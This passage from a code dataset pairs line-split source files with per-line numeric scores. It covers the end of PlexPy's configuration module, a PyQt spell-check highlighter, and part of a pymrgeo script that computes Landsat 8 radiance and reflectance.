0),\n", " 'EMAIL_ON_PLAY': (int, 'Email', 0),\n", " 'EMAIL_ON_STOP': (int, 'Email', 0),\n", " 'EMAIL_ON_PAUSE': (int, 'Email', 0),\n", " 'EMAIL_ON_RESUME': (int, 'Email', 0),\n", " 'EMAIL_ON_BUFFER': (int, 'Email', 0),\n", " 'EMAIL_ON_WATCHED': (int, 'Email', 0),\n", " 'ENABLE_HTTPS': (int, 'General', 0),\n", " 'FIRST_RUN_COMPLETE': (int, 'General', 0),\n", " 'FREEZE_DB': (int, 'General', 0),\n", " 'GIT_BRANCH': (str, 'General', 'master'),\n", " 'GIT_PATH': (str, 'General', ''),\n", " 'GIT_USER': (str, 'General', 'drzoidberg33'),\n", " 'GROWL_ENABLED': (int, 'Growl', 0),\n", " 'GROWL_HOST': (str, 'Growl', ''),\n", " 'GROWL_PASSWORD': (str, 'Growl', ''),\n", " 'GROWL_ON_PLAY': (int, 'Growl', 0),\n", " 'GROWL_ON_STOP': (int, 'Growl', 0),\n", " 'GROWL_ON_PAUSE': (int, 'Growl', 0),\n", " 'GROWL_ON_RESUME': (int, 'Growl', 0),\n", " 'GROWL_ON_BUFFER': (int, 'Growl', 0),\n", " 'GROWL_ON_WATCHED': (int, 'Growl', 0),\n", " 'HOME_LIBRARY_CARDS': (str, 'General', 'library_statistics_first'),\n", " 'HOME_STATS_LENGTH': (int, 'General', 30),\n", " 'HOME_STATS_TYPE': (int, 'General', 0),\n", " 'HOME_STATS_COUNT': (int, 'General', 5),\n", " 'HOME_STATS_CARDS': (str, 'General', 'watch_statistics, top_tv, popular_tv, top_movies, popular_movies, top_music, popular_music, top_users, top_platforms, last_watched'),\n", " 'HTTPS_CERT': (str, 'General', ''),\n", " 'HTTPS_KEY': (str, 'General', ''),\n", " 'HTTP_HOST': (str, 'General', '0.0.0.0'),\n", " 'HTTP_PASSWORD': (str, 'General', ''),\n", " 'HTTP_PORT': (int, 'General', 8181),\n", " 'HTTP_PROXY': (int, 'General', 0),\n", " 'HTTP_ROOT': (str, 'General', '/'),\n", " 'HTTP_USERNAME': (str, 'General', ''),\n", " 'INTERFACE': (str, 'General', 'default'),\n", " 'IP_LOGGING_ENABLE': (int, 'General', 0),\n", " 'JOURNAL_MODE': (str, 'Advanced', 'wal'),\n", " 'LAUNCH_BROWSER': (int, 'General', 1),\n", " 'LOG_DIR': (str, 'General', ''),\n", " 'LOGGING_IGNORE_INTERVAL': (int, 'Monitoring', 120),\n", " 'MOVIE_NOTIFY_ENABLE': (int, 'Monitoring', 0),\n", " 'MOVIE_NOTIFY_ON_START': (int, 'Monitoring', 1),\n", " 'MOVIE_NOTIFY_ON_STOP': (int, 'Monitoring', 0),\n", " 'MOVIE_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0),\n", " 'MUSIC_NOTIFY_ENABLE': (int, 'Monitoring', 0),\n", " 'MUSIC_NOTIFY_ON_START': (int, 'Monitoring', 1),\n", " 'MUSIC_NOTIFY_ON_STOP': (int, 'Monitoring', 0),\n", " 'MUSIC_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0),\n", " 'MUSIC_LOGGING_ENABLE': (int, 'Monitoring', 0),\n", " 'MONITORING_INTERVAL': (int, 'Monitoring', 60),\n", " 'NMA_APIKEY': (str, 'NMA', ''),\n", " 'NMA_ENABLED': (int, 'NMA', 0),\n", " 'NMA_PRIORITY': (int, 'NMA', 0),\n", " 'NMA_ON_PLAY': (int, 'NMA', 0),\n", " 'NMA_ON_STOP': (int, 'NMA', 0),\n", " 'NMA_ON_PAUSE': (int, 'NMA', 0),\n", " 'NMA_ON_RESUME': (int, 'NMA', 0),\n", " 'NMA_ON_BUFFER': (int, 'NMA', 0),\n", " 'NMA_ON_WATCHED': (int, 'NMA', 0),\n", " 'NOTIFY_WATCHED_PERCENT': (int, 'Monitoring', 85),\n", " 'NOTIFY_ON_START_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_START_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) started playing {title}.'),\n", " 'NOTIFY_ON_STOP_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_STOP_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has stopped {title}.'),\n", " 'NOTIFY_ON_PAUSE_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_PAUSE_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has paused {title}.'),\n", " 'NOTIFY_ON_RESUME_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_RESUME_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has resumed {title}.'),\n", " 'NOTIFY_ON_BUFFER_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_BUFFER_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) is buffering {title}.'),\n", " 'NOTIFY_ON_WATCHED_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_WATCHED_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has watched {title}.'),\n", " 'OSX_NOTIFY_APP': (str, 'OSX_Notify', '/Applications/PlexPy'),\n", " 'OSX_NOTIFY_ENABLED': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_PLAY': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_STOP': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_PAUSE': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_RESUME': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_BUFFER': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_WATCHED': (int, 'OSX_Notify', 0),\n", " 'PLEX_CLIENT_HOST': (str, 'Plex', ''),\n", " 'PLEX_ENABLED': (int, 'Plex', 0),\n", " 'PLEX_PASSWORD': (str, 'Plex', ''),\n", " 'PLEX_USERNAME': (str, 'Plex', ''),\n", " 'PLEX_ON_PLAY': (int, 'Plex', 0),\n", " 'PLEX_ON_STOP': (int, 'Plex', 0),\n", " 'PLEX_ON_PAUSE': (int, 'Plex', 0),\n", " 'PLEX_ON_RESUME': (int, 'Plex', 0),\n", " 'PLEX_ON_BUFFER': (int, 'Plex', 0),\n", " 'PLEX_ON_WATCHED': (int, 'Plex', 0),\n", " 'PROWL_ENABLED': (int, 'Prowl', 0),\n", " 'PROWL_KEYS': (str, 'Prowl', ''),\n", " 'PROWL_PRIORITY': (int, 'Prowl', 0),\n", " 'PROWL_ON_PLAY': (int, 'Prowl', 0),\n", " 'PROWL_ON_STOP': (int, 'Prowl', 0),\n", " 'PROWL_ON_PAUSE': (int, 'Prowl', 0),\n", " 'PROWL_ON_RESUME': (int, 'Prowl', 0),\n", " 'PROWL_ON_BUFFER': (int, 'Prowl', 0),\n", " 'PROWL_ON_WATCHED': (int, 'Prowl', 0),\n", " 'PUSHALOT_APIKEY': (str, 'Pushalot', ''),\n", " 'PUSHALOT_ENABLED': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_PLAY': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_STOP': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_PAUSE': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_RESUME': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_BUFFER': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_WATCHED': (int, 'Pushalot', 0),\n", " 'PUSHBULLET_APIKEY': (str, 'PushBullet', ''),\n", " 'PUSHBULLET_DEVICEID': (str, 'PushBullet', ''),\n", " 'PUSHBULLET_CHANNEL_TAG': (str, 'PushBullet', ''),\n", " 'PUSHBULLET_ENABLED': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_PLAY': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_STOP': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_PAUSE': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_RESUME': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_BUFFER': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_WATCHED': (int, 'PushBullet', 0),\n", " 'PUSHOVER_APITOKEN': (str, 'Pushover', ''),\n", " 'PUSHOVER_ENABLED': (int, 'Pushover', 0),\n", " 'PUSHOVER_KEYS': (str, 'Pushover', ''),\n", " 'PUSHOVER_PRIORITY': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_PLAY': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_STOP': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_PAUSE': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_RESUME': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_BUFFER': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_WATCHED': (int, 'Pushover', 0),\n", " 'REFRESH_USERS_INTERVAL': (int, 'Monitoring', 12),\n", " 'REFRESH_USERS_ON_STARTUP': (int, 'Monitoring', 1),\n", " 'TV_NOTIFY_ENABLE': (int, 'Monitoring', 0),\n", " 'TV_NOTIFY_ON_START': (int, 'Monitoring', 1),\n", " 'TV_NOTIFY_ON_STOP': (int, 'Monitoring', 0),\n", " 'TV_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0),\n", " 'TWITTER_ENABLED': (int, 'Twitter', 0),\n", " 'TWITTER_PASSWORD': (str, 'Twitter', ''),\n", " 'TWITTER_PREFIX': (str, 'Twitter', 'PlexPy'),\n", " 'TWITTER_USERNAME': (str, 'Twitter', ''),\n", " 'TWITTER_ON_PLAY': (int, 'Twitter', 0),\n", " 'TWITTER_ON_STOP': (int, 'Twitter', 0),\n", " 'TWITTER_ON_PAUSE': (int, 'Twitter', 0),\n", " 'TWITTER_ON_RESUME': (int, 'Twitter', 0),\n", " 'TWITTER_ON_BUFFER': (int, 'Twitter', 0),\n", " 'TWITTER_ON_WATCHED': (int, 'Twitter', 0),\n", " 'UPDATE_DB_INTERVAL': (int, 'General', 24),\n", " 'VERIFY_SSL_CERT': (bool_int, 'Advanced', 1),\n", " 'VIDEO_LOGGING_ENABLE': (int, 'Monitoring', 1),\n", " 'XBMC_ENABLED': (int, 'XBMC', 0),\n", " 'XBMC_HOST': (str, 'XBMC', ''),\n", " 'XBMC_PASSWORD': (str, 'XBMC', ''),\n", " 'XBMC_USERNAME': (str, 'XBMC', ''),\n", " 'XBMC_ON_PLAY': (int, 'XBMC', 0),\n", " 'XBMC_ON_STOP': (int, 'XBMC', 0),\n", " 'XBMC_ON_PAUSE': (int, 'XBMC', 0),\n", " 'XBMC_ON_RESUME': (int, 'XBMC', 0),\n", " 'XBMC_ON_BUFFER': (int, 'XBMC', 0),\n", " 'XBMC_ON_WATCHED': (int, 'XBMC', 0)\n", "}\n", "# pylint:disable=R0902\n", "# it might be nice to refactor for fewer instance variables\n", "class Config(object):\n", " \"\"\" Wraps access to particular values in a config file \"\"\"\n", "\n", " def __init__(self, config_file):\n", " \"\"\" Initialize the config with values from a file \"\"\"\n", " self._config_file = config_file\n", " self._config = ConfigObj(self._config_file, encoding='utf-8')\n", " for key in _CONFIG_DEFINITIONS.keys():\n", " self.check_setting(key)\n", "\n", " def _define(self, name):\n", " key = name.upper()\n", " ini_key = name.lower()\n", " definition = _CONFIG_DEFINITIONS[key]\n", " if len(definition) == 3:\n", " definition_type, section, default = definition\n", " else:\n", " definition_type, section, _, default = definition\n", " return key, definition_type, section, ini_key, default\n", "\n", " def check_section(self, section):\n", " \"\"\" Check if INI section exists, if not create it \"\"\"\n", " if section not in self._config:\n", " self._config[section] = {}\n", " return True\n", " else:\n", " return False\n", "\n", " def check_setting(self, key):\n", " \"\"\" Cast any value in the config to the right type or use the default \"\"\"\n", " key, definition_type, section, ini_key, default = self._define(key)\n", " self.check_section(section)\n", " try:\n", " my_val = definition_type(self._config[section][ini_key])\n", " except Exception:\n", " my_val = definition_type(default)\n", " self._config[section][ini_key] = my_val\n", " return my_val\n", "\n", " def write(self):\n", " \"\"\" Make a copy of the stored config and write it to the configured file \"\"\"\n", " new_config = ConfigObj(encoding=\"UTF-8\")\n", " new_config.filename = self._config_file\n", "\n", " # first copy over everything from the old config, even if it is not\n", " # correctly defined to keep from losing data\n", " for key, subkeys in self._config.items():\n", " if key not in new_config:\n", " new_config[key] = {}\n", " for subkey, value in subkeys.items():\n", " new_config[key][subkey] = value\n", "\n", " # next make sure that everything we expect to have defined is so\n", " for key in _CONFIG_DEFINITIONS.keys():\n", " key, definition_type, section, ini_key, default = self._define(key)\n", " self.check_setting(key)\n", " if section not in new_config:\n", " new_config[section] = {}\n", " new_config[section][ini_key] = self._config[section][ini_key]\n", "\n", " # Write it to file\n", " plexpy.logger.info(\"Writing configuration to file\")\n", "\n", " try:\n", " new_config.write()\n", " except IOError as e:\n", " plexpy.logger.error(\"Error writing configuration file: %s\", e)\n", "\n", " def __getattr__(self, name):\n", " \"\"\"\n", " Returns something from the ini unless it is a real property\n", " of the configuration object or is not all caps.\n", " \"\"\"\n", " if not re.match(r'[A-Z_]+$', name):\n", " return super(Config, self).__getattr__(name)\n", " else:\n", " return self.check_setting(name)\n", "\n", " def __setattr__(self, name, value):\n", " \"\"\"\n", " Maps all-caps properties to ini values unless they exist on the\n", " configuration object.\n", " \"\"\"\n", " if not re.match(r'[A-Z_]+$', name):\n", " super(Config, self).__setattr__(name, value)\n", " return value\n", " else:\n", " key, definition_type, section, ini_key, default = self._define(name)\n", " self._config[section][ini_key] = definition_type(value)\n", " return self._config[section][ini_key]\n", "\n", " def process_kwargs(self, kwargs):\n", " \"\"\"\n", " Given a big bunch of key value pairs, apply them to the ini.\n", " \"\"\"\n", " for name, value in kwargs.items():\n", " key, definition_type, section, ini_key, default = self._define(name)\n", " self._config[section][ini_key] = definition_type(value)" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.005681818181818182, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0.01, 0.012195121951219513, 0.010526315789473684, 0.012048192771084338, 0.010526315789473684, 0.011904761904761904, 0.010309278350515464, 0.011904761904761904, 0.01020408163265306, 0.011764705882352941, 0.01020408163265306, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.014925373134328358 ]
320
0.000906
false
################################################################################ ### Copyright © 2012-2013 BlackDragonHunt ### ### This file is part of the Super Duper Script Editor. ### ### The Super Duper Script Editor is free software: you can redistribute it ### and/or modify it under the terms of the GNU General Public License as ### published by the Free Software Foundation, either version 3 of the License, ### or (at your option) any later version. ### ### The Super Duper Script Editor is distributed in the hope that it will be ### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of ### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ### GNU General Public License for more details. ### ### You should have received a copy of the GNU General Public License ### along with the Super Duper Script Editor. ### If not, see <http://www.gnu.org/licenses/>. ################################################################################ from PyQt4 import QtGui, QtCore from PyQt4.QtGui import QTextCharFormat, QColor import enchant from enchant.checker import SpellChecker from enchant.tokenize import HTMLChunker import common class SpellCheckHighlighter(QtGui.QSyntaxHighlighter): def __init__(self, parent = None): super(SpellCheckHighlighter, self).__init__(parent) self.set_language("en_US") self.format = QTextCharFormat() self.format.setUnderlineColor(QColor(255, 0, 0)) self.format.setUnderlineStyle(QTextCharFormat.SpellCheckUnderline) self.errors = [] def set_language(self, lang): dict = enchant.DictWithPWL(lang, "data/dict/enchant.txt") self.checker = SpellChecker(dict, chunkers = (HTMLChunker,)) def get_language(self): return self.checker.dict.tag def highlightBlock(self, text): # If there is no previous state, then it's -1, which makes the first line 0. # And every line after that increases as expected. line = self.previousBlockState() + 1 self.setCurrentBlockState(line) # Make sure our error list is long enough to hold this line. for i in range(len(self.errors), line + 1): self.errors.append([]) self.errors[line] = [] self.checker.set_text(common.qt_to_unicode(text)) for err in self.checker: self.setFormat(err.wordpos, len(err.word), self.format) self.errors[line].append((err.word, err.wordpos)) def add(self, word): self.checker.add(word) self.rehighlight() def ignore(self, word): self.checker.ignore_always(word) self.rehighlight() ### EOF ###
[ "################################################################################\n", "### Copyright © 2012-2013 BlackDragonHunt\n", "### \n", "### This file is part of the Super Duper Script Editor.\n", "### \n", "### The Super Duper Script Editor is free software: you can redistribute it\n", "### and/or modify it under the terms of the GNU General Public License as\n", "### published by the Free Software Foundation, either version 3 of the License,\n", "### or (at your option) any later version.\n", "### \n", "### The Super Duper Script Editor is distributed in the hope that it will be\n", "### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "### GNU General Public License for more details.\n", "### \n", "### You should have received a copy of the GNU General Public License\n", "### along with the Super Duper Script Editor.\n", "### If not, see <http://www.gnu.org/licenses/>.\n", "################################################################################\n", "\n", "from PyQt4 import QtGui, QtCore\n", "from PyQt4.QtGui import QTextCharFormat, QColor\n", "\n", "import enchant\n", "from enchant.checker import SpellChecker\n", "from enchant.tokenize import HTMLChunker\n", "\n", "import common\n", "\n", "class SpellCheckHighlighter(QtGui.QSyntaxHighlighter):\n", " def __init__(self, parent = None):\n", " super(SpellCheckHighlighter, self).__init__(parent)\n", " \n", " self.set_language(\"en_US\")\n", " \n", " self.format = QTextCharFormat()\n", " self.format.setUnderlineColor(QColor(255, 0, 0))\n", " self.format.setUnderlineStyle(QTextCharFormat.SpellCheckUnderline)\n", " \n", " self.errors = []\n", " \n", " def set_language(self, lang):\n", " dict = enchant.DictWithPWL(lang, \"data/dict/enchant.txt\")\n", " self.checker = SpellChecker(dict, chunkers = (HTMLChunker,))\n", " \n", " def get_language(self):\n", " return self.checker.dict.tag\n", " \n", " def highlightBlock(self, text):\n", " \n", " # If there is no previous state, then it's -1, which makes the first line 0.\n", " # And every line after that increases as expected.\n", " line = self.previousBlockState() + 1\n", " self.setCurrentBlockState(line)\n", " \n", " # Make sure our error list is long enough to hold this line.\n", " for i in range(len(self.errors), line + 1):\n", " self.errors.append([])\n", " \n", " self.errors[line] = []\n", " self.checker.set_text(common.qt_to_unicode(text))\n", " \n", " for err in self.checker:\n", " self.setFormat(err.wordpos, len(err.word), self.format)\n", " self.errors[line].append((err.word, err.wordpos))\n", " \n", " def add(self, word):\n", " self.checker.add(word)\n", " self.rehighlight()\n", " \n", " def ignore(self, word):\n", " self.checker.ignore_always(word)\n", " self.rehighlight()\n", "\n", "### EOF ###" ]
[ 0.012345679012345678, 0.023809523809523808, 0.2, 0.017857142857142856, 0.2, 0.013157894736842105, 0.013513513513513514, 0.0125, 0.023255813953488372, 0.2, 0.012987012987012988, 0.013333333333333334, 0.015151515151515152, 0.02040816326530612, 0.2, 0.014285714285714285, 0.021739130434782608, 0.020833333333333332, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01818181818181818, 0.08108108108108109, 0, 0.2, 0, 0.2, 0, 0, 0, 0.2, 0, 0.3333333333333333, 0.03125, 0, 0.03076923076923077, 0.3333333333333333, 0.038461538461538464, 0, 0.3333333333333333, 0.029411764705882353, 0.2, 0.012345679012345678, 0, 0, 0, 0.2, 0, 0, 0.034482758620689655, 0.2, 0, 0, 0.2, 0, 0.016129032258064516, 0.017857142857142856, 0.3333333333333333, 0.043478260869565216, 0, 0, 0.3333333333333333, 0.038461538461538464, 0, 0, 0, 0.18181818181818182 ]
75
0.062506
false
# -*- coding: utf-8 -*- import json import math import os from pymrgeo import MrGeo from pymrgeo.rastermapop import RasterMapOp def toa_reflectance(image, metadata, band): scales = metadata['L1_METADATA_FILE']['RADIOMETRIC_RESCALING'] mult = scales['REFLECTANCE_MULT_BAND_' + str(band)] add = scales['REFLECTANCE_ADD_BAND_' + str(band)] print('band: ' + str(band) + ' mult: ' + str(mult) + ' add: ' + str(add)) rad = ((image * mult) + add) return rad def toa_radiance(image, metadata, band): scales = metadata['L1_METADATA_FILE']['RADIOMETRIC_RESCALING'] mult = scales['RADIANCE_MULT_BAND_' + str(band)] add = scales['RADIANCE_ADD_BAND_' + str(band)] sun_elev = metadata['L1_METADATA_FILE']['IMAGE_ATTRIBUTES']['SUN_ELEVATION'] * 0.0174533 # degrees to rad print('band: ' + str(band) + ' mult: ' + str(mult) + ' add: ' + str(add)) refl = ((image * mult) + add) / math.sin(sun_elev) return refl if __name__ == "__main__": landsat = {} # find all the landsat images root = '/data/gis-data/images/landsat8/LC80140342014187LGN00' if os.path.exists(root): for dirname, subdirs, files in os.walk(root): for name in files: pathname = os.path.join(dirname, name) base, ext = os.path.splitext(pathname) ext = ext.lower() base = base.lower() print(name) if ext == '.tif': # find the band number split = base.split('_') if len(split) != 2: raise Exception('Bad TIF filename: ' + pathname) print(split[1]) b = split[1] if b == 'bqa': landsat[b] = pathname else: # strip off the "B" band = int(b[1:]) landsat[band] = pathname pass elif ext == '.json': landsat[ext[1:]] = pathname pass if not landsat.has_key('json'): raise Exception('No JSON metadata file in ' + root) with open(landsat['json']) as metafile: metadata = json.load(metafile) mrgeo = MrGeo() # mrgeo.usedebug() mrgeo.start() bqa = mrgeo.ingest_image(landsat['bqa']) # bqa.export('/data/export/landsat-bqa.tif', singleFile=True) cloud_mask = bqa < 32768 # 0 where clouds, 1 where no clouds # cloud_mask.export('/data/export/landsat-clouds.tif', singleFile=True) red = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[4]), negativeConst=RasterMapOp.nan()) green = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[3]), negativeConst=RasterMapOp.nan()) blue = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[2]), negativeConst=RasterMapOp.nan()) # red = mrgeo.ingest_image(landsat[4]) # green = mrgeo.ingest_image(landsat[3]) # blue = mrgeo.ingest_image(landsat[2]) red.save('landsat-dn-r') # red.export('/data/export/landsat-dn-r.tif', singleFile=True) # green.export('/data/export/landsat-dn-g.tif', singleFile=True) # blue.export('/data/export/landsat-dn-b.tif', singleFile=True) rgb = red.bandcombine(green, blue) rgb.export('/data/export/landsat-rgb-dn.tif', singleFile=True) r_rad = toa_radiance(red, metadata, 4) g_rad = toa_radiance(green, metadata, 3) b_rad = toa_radiance(blue, metadata, 2) r_rad.export('/data/export/landsat-rad-r.tif', singleFile=True) g_rad.export('/data/export/landsat-rad-g.tif', singleFile=True) b_rad.export('/data/export/landsat-rad-b.tif', singleFile=True) rgb = r_rad.bandcombine(g_rad, b_rad) rgb.export('/data/export/landsat-rgb-rad.tif', singleFile=True) # compute Top of Atmosphere (TOA) Reflectance of the bands (http://landsat.usgs.gov/Landsat8_Using_Product.php) r_refl = toa_reflectance(red, metadata, 4) g_refl = toa_reflectance(green, metadata, 3) b_refl = toa_reflectance(blue, metadata, 2) # combine the bands rgb = r_refl.bandcombine(g_refl, b_refl) # rgb = rgb.convert('byte', 'fit') rgb.export('/data/export/landsat-rgb-refl.tif', singleFile=True) # ones = mrgeo.load_image("all-ones-save") # slope = ones.slope() # hundreds = mrgeo.load_image("all-hundreds") # aspect = hundreds.aspect() # slope.save("slope-test") # aspect.save("aspect-test") # print("***** Starting *****") # elevation = mrgeo.load_image("small-elevation") # elevation.export("/data/export/small-elevation", singleFile=True) # slope = small_elevation.slope() # slope.save("slope-test") # print("***** Finished Slope 1 *****") # # slope = small_elevation.slope("rad") # slope.save("slope-test2") # print("***** Finished Slope 2 *****") # sub1 = small_elevation - 5 # sub2 = 5 - small_elevation # # sub3 = small_elevation.clone() # sub3 -= 5 # hundreds = mrgeo.load_image("all-hundreds-save") # hundreds.export("/data/export/100-export-test", singleFile=True) # # slope = mrgeo.load_image("santiago-aster") # slope.export("/data/export/santiago-aster", singleFile=True) # hundreds.export("/data/export/hundreds-export-test", singleFile=True) # sub = hundreds + ones # # sub.export("/data/export/101-export-test", singleFile=True) # zen = 30.0 * 0.0174532925 # sun 30 deg above the horizon # sunaz = 270.0 * 0.0174532925 # sun from 270 deg (west) # # coszen = math.cos(zen) # sinzen = math.sin(zen) # # slope = elevation.slope() # aspect = elevation.aspect() # # hill = 255 * ((coszen * slope.cos()) + (sinzen * slope.sin() * (sunaz - aspect).cos())) # # "hill = 255.0 * ((coszen * cos(sl)) + (sinzen * sin(sl) * cos(sunaz - as)))" # # hill.export("/data/export/hillshade-test", singleFile=True) mrgeo.stop() print("***** Done *****")
[ "# -*- coding: utf-8 -*-\n", "import json\n", "import math\n", "import os\n", "\n", "from pymrgeo import MrGeo\n", "from pymrgeo.rastermapop import RasterMapOp\n", "\n", "\n", "def toa_reflectance(image, metadata, band):\n", " scales = metadata['L1_METADATA_FILE']['RADIOMETRIC_RESCALING']\n", "\n", " mult = scales['REFLECTANCE_MULT_BAND_' + str(band)]\n", " add = scales['REFLECTANCE_ADD_BAND_' + str(band)]\n", "\n", " print('band: ' + str(band) + ' mult: ' + str(mult) + ' add: ' + str(add))\n", "\n", " rad = ((image * mult) + add)\n", " return rad\n", "\n", "\n", "def toa_radiance(image, metadata, band):\n", " scales = metadata['L1_METADATA_FILE']['RADIOMETRIC_RESCALING']\n", "\n", " mult = scales['RADIANCE_MULT_BAND_' + str(band)]\n", " add = scales['RADIANCE_ADD_BAND_' + str(band)]\n", "\n", " sun_elev = metadata['L1_METADATA_FILE']['IMAGE_ATTRIBUTES']['SUN_ELEVATION'] * 0.0174533 # degrees to rad\n", "\n", " print('band: ' + str(band) + ' mult: ' + str(mult) + ' add: ' + str(add))\n", "\n", " refl = ((image * mult) + add) / math.sin(sun_elev)\n", " return refl\n", "\n", "\n", "if __name__ == \"__main__\":\n", "\n", " landsat = {}\n", " # find all the landsat images\n", " root = '/data/gis-data/images/landsat8/LC80140342014187LGN00'\n", " if os.path.exists(root):\n", " for dirname, subdirs, files in os.walk(root):\n", " for name in files:\n", " pathname = os.path.join(dirname, name)\n", " base, ext = os.path.splitext(pathname)\n", " ext = ext.lower()\n", " base = base.lower()\n", "\n", " print(name)\n", " if ext == '.tif':\n", " # find the band number\n", " split = base.split('_')\n", " if len(split) != 2:\n", " raise Exception('Bad TIF filename: ' + pathname)\n", "\n", " print(split[1])\n", " b = split[1]\n", " if b == 'bqa':\n", " landsat[b] = pathname\n", " else:\n", " # strip off the \"B\"\n", " band = int(b[1:])\n", " landsat[band] = pathname\n", " pass\n", " elif ext == '.json':\n", " landsat[ext[1:]] = pathname\n", " pass\n", "\n", " if not landsat.has_key('json'):\n", " raise Exception('No JSON metadata file in ' + root)\n", "\n", " with open(landsat['json']) as metafile:\n", " metadata = json.load(metafile)\n", "\n", " mrgeo = MrGeo()\n", " # mrgeo.usedebug()\n", "\n", " mrgeo.start()\n", "\n", " bqa = mrgeo.ingest_image(landsat['bqa'])\n", " # bqa.export('/data/export/landsat-bqa.tif', singleFile=True)\n", "\n", " cloud_mask = bqa < 32768 # 0 where clouds, 1 where no clouds\n", " # cloud_mask.export('/data/export/landsat-clouds.tif', singleFile=True)\n", "\n", " red = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[4]), negativeConst=RasterMapOp.nan())\n", " green = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[3]), negativeConst=RasterMapOp.nan())\n", " blue = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[2]), negativeConst=RasterMapOp.nan())\n", " # red = mrgeo.ingest_image(landsat[4])\n", " # green = mrgeo.ingest_image(landsat[3])\n", " # blue = mrgeo.ingest_image(landsat[2])\n", "\n", " red.save('landsat-dn-r')\n", " # red.export('/data/export/landsat-dn-r.tif', singleFile=True)\n", " # green.export('/data/export/landsat-dn-g.tif', singleFile=True)\n", " # blue.export('/data/export/landsat-dn-b.tif', singleFile=True)\n", "\n", " rgb = red.bandcombine(green, blue)\n", " rgb.export('/data/export/landsat-rgb-dn.tif', singleFile=True)\n", "\n", " r_rad = toa_radiance(red, metadata, 4)\n", " g_rad = 